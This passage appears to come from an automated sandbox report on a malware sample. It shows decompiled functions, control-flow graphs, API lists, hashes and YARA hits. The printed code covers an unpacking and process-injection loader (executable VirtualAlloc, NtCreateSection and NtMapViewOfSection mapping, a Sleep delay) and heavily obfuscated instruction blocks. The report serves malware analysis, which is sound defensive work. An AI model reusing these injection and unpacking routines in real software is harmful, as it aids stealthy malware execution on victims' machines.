                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 35e92747d0d6b9a951735621b21a4a40d652c97b84ba7f77340fa48fb621f182
                    • Instruction ID: 89e6db08217f17037b3c9ea992626000aec066f246d799dfcc25d33cb0bbcea7
                    • Opcode Fuzzy Hash: 35e92747d0d6b9a951735621b21a4a40d652c97b84ba7f77340fa48fb621f182
                    • Instruction Fuzzy Hash: 0151FAB5900249BFEB208F91CC89FAF7BB8EF85710F104159FA11AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 305 656f65-656f7e 306 656f80-656f82 305->306 307 656f84 306->307 308 656f89-656f95 CreateToolhelp32Snapshot 306->308 307->308 309 656fa5-656fb2 Module32First 308->309 310 656f97-656f9d 308->310 311 656fb4-656fb5 call 656c24 309->311 312 656fbb-656fc3 309->312 310->309 315 656f9f-656fa3 310->315 316 656fba 311->316 315->306 315->309 316->312
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00656F8D
                    • Module32First.KERNEL32(00000000,00000224), ref: 00656FAD
                    Memory Dump Source
                    • Source File: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Offset: 00652000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_652000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 1e892c76302c51fb2ff11a3e02e09e3d28883aa82fabd485f9efddce86e82c09
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 58F068355007106BD7202BB5E88DAAAB6EEAF49725F500568FA42921C0DB70EC498661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 60003c-600047 1 600049 0->1 2 60004c-600263 call 600a3f call 600e0f call 600d90 VirtualAlloc 0->2 1->2 17 600265-600289 call 600a69 2->17 18 60028b-600292 2->18 23 6002ce-6003c2 VirtualProtect call 600cce call 600ce7 17->23 20 6002a1-6002b0 18->20 22 6002b2-6002cc 20->22 20->23 22->20 29 6003d1-6003e0 23->29 30 6003e2-600437 call 600ce7 29->30 31 600439-6004b8 VirtualFree 29->31 30->29 33 6005f4-6005fe 31->33 34 6004be-6004cd 31->34 37 600604-60060d 33->37 38 60077f-600789 33->38 36 6004d3-6004dd 34->36 36->33 40 6004e3-600505 36->40 37->38 43 600613-600637 37->43 41 6007a6-6007b0 38->41 42 60078b-6007a3 38->42 54 600517-600520 40->54 55 600507-600515 40->55 45 6007b6-6007cb 41->45 46 60086e-6008be LoadLibraryA 41->46 42->41 44 60063e-600648 43->44 44->38 47 60064e-60065a 44->47 49 6007d2-6007d5 45->49 53 6008c7-6008f9 46->53 47->38 52 600660-60066a 47->52 50 600824-600833 49->50 51 6007d7-6007e0 49->51 60 600839-60083c 50->60 57 6007e2 51->57 58 6007e4-600822 51->58 59 60067a-600689 52->59 61 600902-60091d 53->61 62 6008fb-600901 53->62 56 600526-600547 54->56 55->56 63 60054d-600550 56->63 57->50 58->49 64 600750-60077a 59->64 65 60068f-6006b2 59->65 60->46 66 60083e-600847 60->66 62->61 67 6005e0-6005ef 63->67 68 600556-60056b 63->68 64->44 69 6006b4-6006ed 65->69 70 6006ef-6006fc 65->70 71 600849 66->71 72 60084b-60086c 66->72 67->36 74 60056d 68->74 75 60056f-60057a 68->75 69->70 76 60074b 70->76 77 6006fe-600748 70->77 71->46 72->60 74->67 78 60059b-6005bb 75->78 79 60057c-600599 75->79 76->59 77->76 84 6005bd-6005db 78->84 79->84 84->63
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: bbbf4db3596f4485a88410cc2d3c193017e3a9667bdecbbed5112f2fd1dd1f22
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 02526974A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E54DAB391DB30AE85DF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 274 40c96a-40c983 call 4105f7 277 40c985-40c988 274->277 278 40c99d-40c9a1 274->278 279 40ca2d-40ca2f 277->279 280 40c9a3-40c9b8 call 41065a 278->280 281 40c98d-40c98f 278->281 280->277 287 40c9ba-40c9c1 280->287 282 40c991 281->282 283 40c992-40c999 281->283 282->283 283->278 288 40ca05-40ca08 287->288 289 40c9c3-40c9d0 288->289 290 40ca0a-40ca29 288->290 293 40c9d2-40c9d5 call 41065a 289->293 294 40ca03 289->294 295 40ca2b-40ca2c 290->295 297 40c9da-40c9e0 293->297 294->288 295->279 298 40ca30-40ca45 297->298 299 40c9e2-40c9ef 297->299 298->295 302 40ca00 299->302 303 40c9f1-40c9fd 299->303 302->294 303->302
                    APIs
                    • ___initmbctable.LIBCMT ref: 0040C972
                      • Part of subcall function 004105F7: __setmbcp.LIBCMT ref: 00410602
                    • __calloc_crt.LIBCMT ref: 0040C9A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: ___initmbctable__calloc_crt__setmbcp
                    • String ID:
                    • API String ID: 4150745854-0
                    • Opcode ID: bbed12e89968c4f6c2cbb67d26b3dfc3fbc67c745ac89b501c6bab3494cf33b4
                    • Instruction ID: ba80878632f788adcc880e20e5c52df4f94d7748c8d254a861737b16b4d9621a
                    • Opcode Fuzzy Hash: bbed12e89968c4f6c2cbb67d26b3dfc3fbc67c745ac89b501c6bab3494cf33b4
                    • Instruction Fuzzy Hash: 8B210EB3904111AAEF2197366C85B5737849B41365F35033FF891722D1DA7D9882865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 318 600e0f-600e24 SetErrorMode * 2 319 600e26 318->319 320 600e2b-600e2c 318->320 319->320
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 5e5b7fc9be17af52c8aa1593ebc2cf7226538b4808b2ec5a12ddc81c56322646
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 08D0123114512877D7002A94DC09BCE7B1CDF05B62F008411FB0DE9180C770994046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 321 40ce1f-40ce41 HeapCreate 322 40ce43-40ce44 321->322 323 40ce45-40ce4e 321->323
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040CE34
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: f58d1642b2d06b1893d901f714456932096660bd81b9c58e6896f47aa16a25e0
                    • Instruction ID: c4e98715908aa5aa5608ab1660a6e083fbb4bcb1d5e1bcca78ae5a112a13d87e
                    • Opcode Fuzzy Hash: f58d1642b2d06b1893d901f714456932096660bd81b9c58e6896f47aa16a25e0
                    • Instruction Fuzzy Hash: C4D0A7366543099FEB105F74BD087233BECD384395F004436B90CC61A0F574C941C648
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 324 4017f4-401817 328 401825 324->328 329 40181e-401821 324->329 328->329 330 401828-40184a call 401134 Sleep call 401366 328->330 329->330 335 401859-40185f 330->335 336 40184c-401854 call 40143b 330->336 339 401865-40188e call 401134 335->339 340 40186e 335->340 336->335 340->339
                    C-Code - Quality: 43%
                    			E004017F4(void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				void* __ebp;
                    				intOrPtr _t8;
                    				void* _t11;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t19;
                    				intOrPtr* _t23;
                    
                    				_t27 = __fp0;
                    				_t25 = __eflags;
                    				_t20 = __edi;
                    				_push(__edi);
                    				_push(0x182d);
                    				_t8 =  *_t23;
                    				_push(0x5d);
                    				E00401134(_t8, __edi, __eflags, __fp0);
                    				_t16 = _a4;
                    				Sleep(0x1388);
                    				_t11 = L00401366(_t19, _t25, _t16, _a8, _a12,  &_v8); // executed
                    				_t26 = _t11;
                    				if(_t11 != 0) {
                    					E0040143B(_t26, _t16, _t11, _v8, _a16); // executed
                    				}
                    				 *_t16(0xffffffff, 0);
                    				_t14 = E00401134(0x182d, _t20, _t26, _t27);
                    				[far dword [edi+0x5e]();
                    				return _t14;
                    			}











                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: 4833809e19ebbce1afda95b8d958c6ac0413f9150f8c520dfd08e6e3e547968f
                    • Instruction ID: df28ea85591e98f8d733e92c0a85c910368ecf21aa371a8bf2e7d42b67981e89
                    • Opcode Fuzzy Hash: 4833809e19ebbce1afda95b8d958c6ac0413f9150f8c520dfd08e6e3e547968f
                    • Instruction Fuzzy Hash: 05014F77608204E7DB017AA59C41EAA366CAB45754F20C537FA13781F1D63CCB12ABAB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 347 656c24-656c5e call 656f37 350 656c60-656c93 VirtualAlloc call 656cb1 347->350 351 656cac 347->351 353 656c98-656caa 350->353 351->351 353->351
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00656C75
                    Memory Dump Source
                    • Source File: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Offset: 00652000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_652000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 32ec4525702671d01a75edfb2c352691e6d0173590d656ace703508c035f3c7f
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 58112B79A00208EFDB01DF98C985E99BBF5EF08351F458094F9889B362D771EA54DF84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 354 401824-401825 356 401828-40184a call 401134 Sleep call 401366 354->356 357 40181e-401821 354->357 362 401859-40185f 356->362 363 40184c-401854 call 40143b 356->363 357->356 366 401865-40188e call 401134 362->366 367 40186e 362->367 363->362 367->366
                    C-Code - Quality: 56%
                    			E00401824(void* __edi, void* __eflags, void* __fp0) {
                    				void* _t8;
                    				void* _t11;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t27 = __fp0;
                    				_t25 = __eflags;
                    				_t21 = __edi;
                    				_pop(_t8);
                    				_t22 = 0x5d;
                    				E00401134(_t8, __edi, __eflags, __fp0);
                    				_t16 =  *((intOrPtr*)(_t22 + 8));
                    				Sleep(0x1388);
                    				_t11 = L00401366(_t20, _t25, _t16,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                    				_t26 = _t11;
                    				if(_t11 != 0) {
                    					E0040143B(_t26, _t16, _t11,  *((intOrPtr*)(_t22 - 4)),  *((intOrPtr*)(_t22 + 0x14))); // executed
                    				}
                    				 *_t16(0xffffffff, 0);
                    				_t14 = E00401134(0x182d, _t21, _t26, _t27);
                    				[far dword [edi+0x5e]();
                    				return _t14;
                    			}









                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: f592541f30fbcca03b96e500b31fa5f982bcaff6f64a27eb3c64f1708acf91e7
                    • Instruction ID: 6ef1ed1bf64fe5eabda647e92d7164afe002825c4aa424cea749e35a608ab800
                    • Opcode Fuzzy Hash: f592541f30fbcca03b96e500b31fa5f982bcaff6f64a27eb3c64f1708acf91e7
                    • Instruction Fuzzy Hash: 55F01277204105E7DB057AA19C41EA92629DB05355F20C937BA13B84F1C63CC712AB6B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 374 40181f-40184a call 401134 Sleep call 401366 380 401859-40185f 374->380 381 40184c-401854 call 40143b 374->381 384 401865-40188e call 401134 380->384 385 40186e 380->385 381->380 385->384
                    C-Code - Quality: 55%
                    			E0040181F(void* __edi, void* __eflags, void* __fp0) {
                    				void* _t8;
                    				void* _t11;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t27 = __fp0;
                    				_t25 = __eflags;
                    				_t21 = __edi;
                    				_pop(_t22);
                    				E00401134(_t8, __edi, __eflags, __fp0);
                    				_t16 =  *((intOrPtr*)(_t22 + 8));
                    				Sleep(0x1388);
                    				_t11 = L00401366(_t20, _t25, _t16,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                    				_t26 = _t11;
                    				if(_t11 != 0) {
                    					E0040143B(_t26, _t16, _t11,  *((intOrPtr*)(_t22 - 4)),  *((intOrPtr*)(_t22 + 0x14))); // executed
                    				}
                    				 *_t16(0xffffffff, 0);
                    				_t14 = E00401134(0x182d, _t21, _t26, _t27);
                    				[far dword [edi+0x5e]();
                    				return _t14;
                    			}









                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: 499b95e636ba847a66cd2fb4256d29b3f3f23bbd9eaf3472c39998fbc980e936
                    • Instruction ID: 22086707188f3d238c80ea2b1502365f527a58e6f5fc57b11dc43d2376d567d0
                    • Opcode Fuzzy Hash: 499b95e636ba847a66cd2fb4256d29b3f3f23bbd9eaf3472c39998fbc980e936
                    • Instruction Fuzzy Hash: 20F03077604104EBDB05BBA58C41EA93729EB05355F208537FA12B84F1CA3DC712AB2B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: ca3e0dc928b3eb58f5f920a532e04de175240ee417e0ebceb62b96e15e73e0bb
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: 683137B6900609DFEB14CF99C880BAEBBF6FF48324F25504AD441A7351D771EA45CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 20%
                    			E004021E7(signed char __edx, signed int __esi, void* __eflags, void* __fp0, void* _a39, signed char _a932187529) {
                    				void* _v3;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr _t80;
                    				void* _t81;
                    				signed char _t88;
                    				signed int _t93;
                    				signed int _t98;
                    				signed char _t143;
                    				signed char _t144;
                    				signed char _t145;
                    				void* _t150;
                    				signed char _t154;
                    				signed char _t155;
                    				intOrPtr _t172;
                    				signed char _t173;
                    				signed char _t178;
                    				signed char _t179;
                    				void* _t182;
                    				void* _t192;
                    				void* _t193;
                    				void* _t196;
                    				void* _t198;
                    				void* _t203;
                    				void* _t205;
                    				void* _t206;
                    				void* _t207;
                    				void* _t209;
                    				void* _t210;
                    				void* _t211;
                    				void* _t212;
                    				void* _t214;
                    				void* _t215;
                    				void* _t216;
                    				void* _t223;
                    				void* _t226;
                    				void* _t228;
                    				void* _t233;
                    				void* _t235;
                    				void* _t236;
                    				void* _t237;
                    				void* _t239;
                    				void* _t240;
                    				void* _t241;
                    				void* _t242;
                    				void* _t244;
                    				void* _t245;
                    				signed int _t296;
                    				void* _t306;
                    				intOrPtr* _t307;
                    				intOrPtr* _t308;
                    
                    				_t296 = __esi;
                    				_t178 = __edx;
                    				_t307 = _t306 - 0x3c;
                    				_push(__esi);
                    				_push(_t182);
                    				_push(0x2224);
                    				_t80 =  *_t307;
                    				_t308 = _t307 + 4;
                    				_push(0x288);
                    				_t172 =  *_t308;
                    				_t81 = E00401134(_t80, _t182, __eflags, __fp0);
                    				asm("sbb ah, [ebx+0x5f5f5f5e]");
                    				asm("aam 0x2");
                    				_push(_t182);
                    				asm("aaa");
                    				 *(_t81 - 0x15) =  *(_t81 - 0x15) ^ _t178;
                    				asm("daa");
                    				asm("aaa");
                    				asm("popad");
                    				_t173 = _t172 -  *((intOrPtr*)((_t296 ^  *0x46) + 9));
                    				_t88 =  *0x9fda470c;
                    				asm("fiadd dword [ebp+ebx*2+0x5f]");
                    				_t192 = _t88;
                    				asm("fcomp qword [ecx-0x484a4ba9]");
                    				_pop(_t193);
                    				asm("sbb bl, [edi+0x18]");
                    				_t196 = ss;
                    				_t198 = es;
                    				asm("sbb al, 0x5f");
                    				ss = ds;
                    				asm("adc [edi+0x1a], ebx");
                    				_t203 = ss;
                    				_pop(_t205);
                    				_pop(_t206);
                    				_pop(_t207);
                    				asm("sbb al, 0x5f");
                    				_pop(_t209);
                    				_t143 = (( *((intOrPtr*)(_t192 + 0x5f)) +  *((intOrPtr*)(_t193 + 0xd)) |  *(_t196 + 0xd)) +  *((intOrPtr*)(_t198 + 0x12)) +  *((intOrPtr*)(_t203 + 0xc)) -  *((intOrPtr*)(_t205 + 0x3a)) ^  *(_t206 + 3)) -  *((intOrPtr*)(_t207 + 0x2d)) -  *((intOrPtr*)(_t209 + 0x1c));
                    				_pop(_t210);
                    				 *(_t210 + 0x31) =  *(_t210 + 0x31) ^ _t143;
                    				_pop(_t211);
                    				_t144 = _t143 -  *((intOrPtr*)(_t211 + 0x2d));
                    				_pop(_t212);
                    				 *(_t212 + 0x33) =  *(_t212 + 0x33) ^ _t144;
                    				_pop(_t214);
                    				_t145 = _t144 +  *((intOrPtr*)(_t214 + 0x1a));
                    				_pop(_t215);
                    				 *(_t215 + 0x2a) =  *(_t215 + 0x2a) ^ _t145;
                    				_pop(_t216);
                    				asm("sbb ebx, [edi+0x1a]");
                    				_t223 = ss;
                    				asm("sbb bl, [edi+0x18]");
                    				_t226 = ss;
                    				_t93 = (_t88 | 0x0000005f) - 0xffffffffcea0c600 | 0x5f;
                    				_t228 = es;
                    				asm("sbb al, 0x5f");
                    				ss = ds;
                    				asm("adc [edi+0x1a], ebx");
                    				_t233 = ss;
                    				_t150 = ((_t145 ^  *(_t216 + 3)) +  *((intOrPtr*)(_t223 + 0xd)) |  *(_t226 + 0xd)) +  *((intOrPtr*)(_t228 + 0x12)) +  *((intOrPtr*)(_t233 + 0xc));
                    				_pop(_t235);
                    				do {
                    					_pop(_t236);
                    					_pop(_t237);
                    					asm("sbb al, 0x5f");
                    					_pop(_t239);
                    					_t154 = (_t150 -  *((intOrPtr*)(_t235 + 0x3a)) ^  *(_t236 + 3)) -  *((intOrPtr*)(_t237 + 0x2d)) -  *((intOrPtr*)(_t239 + 0x1c));
                    					_pop(_t240);
                    					 *(_t240 + 0x31) =  *(_t240 + 0x31) ^ _t154;
                    					_pop(_t241);
                    					_t155 = _t154 -  *((intOrPtr*)(_t241 + 0x2d));
                    					_pop(_t242);
                    					 *(_t242 + 0x33) =  *(_t242 + 0x33) ^ _t155;
                    					_pop(_t244);
                    					_pop(_t245);
                    					 *(_t245 + 0x2a) =  *(_t245 + 0x2a) ^ _t155 +  *((intOrPtr*)(_t244 + 0x1a));
                    					asm("sbb al, 0x5f");
                    					_t98 = _t93 - 0xffffffffcea0c600 | 0x5f;
                    					_push(ss);
                    					asm("popad");
                    					asm("aaa");
                    					_t150 = _t98;
                    					_pop(_t235);
                    					_t93 = _t98 ^ 0x670ca01f;
                    					asm("salc");
                    					asm("sbb dh, [edi+0xca00f09]");
                    				} while (_t93 > 0);
                    				_t179 = _t178 -  *((intOrPtr*)(_t235 + 0xd9b0ad2));
                    				asm("wait");
                    				 *_t179 =  *_t179 << _t173;
                    				asm("sbb [ebx+0x5f], bl");
                    				asm("salc");
                    				asm("sbb [edi-0x68], dl");
                    				asm("sbb [ebx+0x1f], dl");
                    				asm("sbb [edi+0x5f], cl");
                    				asm("sbb [ebx+0x5f], cl");
                    				 *0xbb0ad256 =  *0xbb0ad256 | _t179;
                    				asm("ficomp dword [edi+0x5f99da50]");
                    				asm("ror byte [edx], cl");
                    				asm("iretd");
                    				asm("stosd");
                    				asm("ror byte [edx], cl");
                    				asm("stosd");
                    				asm("ficomp dword [edi+0x22dc262a]");
                    				asm("sbb ch, [ebx-0x29b4e02c]");
                    				asm("sbb ah, [edi+0x2264a06e]");
                    				asm("cmpsd");
                    				asm("ror byte [edx], cl");
                    				 *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) =  *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) |  *0x5f5fcfcc - 0x0000003c ^ 0x355f355f;
                    				asm("retf");
                    				asm("fcomp qword [edx]");
                    				asm("scasd");
                    				asm("ror byte [edx], cl");
                    				 *( *0x5f35af2a - 0x335f44d6) =  *( *0x5f35af2a - 0x335f44d6) |  *0x5f35af2a;
                    				asm("retf");
                    				asm("ficomp dword [edi+0x22dc482a]");
                    				asm("sbb ch, [edi+0xf4f1fd2]");
                    				asm("pushfd");
                    				asm("arpl [eax+0xca0bb2a], sp");
                    				asm("arpl sp, bx");
                    				asm("cdq");
                    				 *0x5f5f5f5f =  *0x1a9858b4;
                    				_a932187529 = _a932187529 & 0x0000007b;
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2295373b1a9ec7701514fd28f41310fa92f3764e02d211d9c0ec9fc9e8afd442
                    • Instruction ID: 574b175cd4c3276966a44caaa50243e2d0c3fd8cacfb1010bc964ede041cf50b
                    • Opcode Fuzzy Hash: 2295373b1a9ec7701514fd28f41310fa92f3764e02d211d9c0ec9fc9e8afd442
                    • Instruction Fuzzy Hash: AF51732F35A6C2EAC7018A7EF9958DDFF20FDC663430856B7C28499C43C711A06BD6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a31b03fc7a9bbcde54778cce94f8b08067c51e8834f9093aa2ee711ba3f86d3
                    • Instruction ID: 211cf0a3402be2b85703a1d739b6ce73781c66b293247b63146baa2529e2b0b2
                    • Opcode Fuzzy Hash: 1a31b03fc7a9bbcde54778cce94f8b08067c51e8834f9093aa2ee711ba3f86d3
                    • Instruction Fuzzy Hash: A351742F35A6C2EAC7058A7EF9998DDBF20FDC66303085677C28449D43C711A56BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 21%
                    			E00402203(signed char __edx, void* __edi, signed int __esi, void* __eflags, void* __fp0) {
                    				intOrPtr _t80;
                    				void* _t81;
                    				signed char _t88;
                    				signed int _t93;
                    				signed int _t98;
                    				signed char _t142;
                    				signed char _t143;
                    				signed char _t144;
                    				void* _t149;
                    				signed char _t153;
                    				signed char _t154;
                    				intOrPtr _t171;
                    				signed char _t172;
                    				signed char _t177;
                    				signed char _t178;
                    				void* _t181;
                    				void* _t191;
                    				void* _t192;
                    				void* _t195;
                    				void* _t197;
                    				void* _t202;
                    				void* _t204;
                    				void* _t205;
                    				void* _t206;
                    				void* _t208;
                    				void* _t209;
                    				void* _t210;
                    				void* _t211;
                    				void* _t213;
                    				void* _t214;
                    				void* _t215;
                    				void* _t222;
                    				void* _t225;
                    				void* _t227;
                    				void* _t232;
                    				void* _t234;
                    				void* _t235;
                    				void* _t236;
                    				void* _t238;
                    				void* _t239;
                    				void* _t240;
                    				void* _t241;
                    				void* _t243;
                    				void* _t244;
                    				signed int _t295;
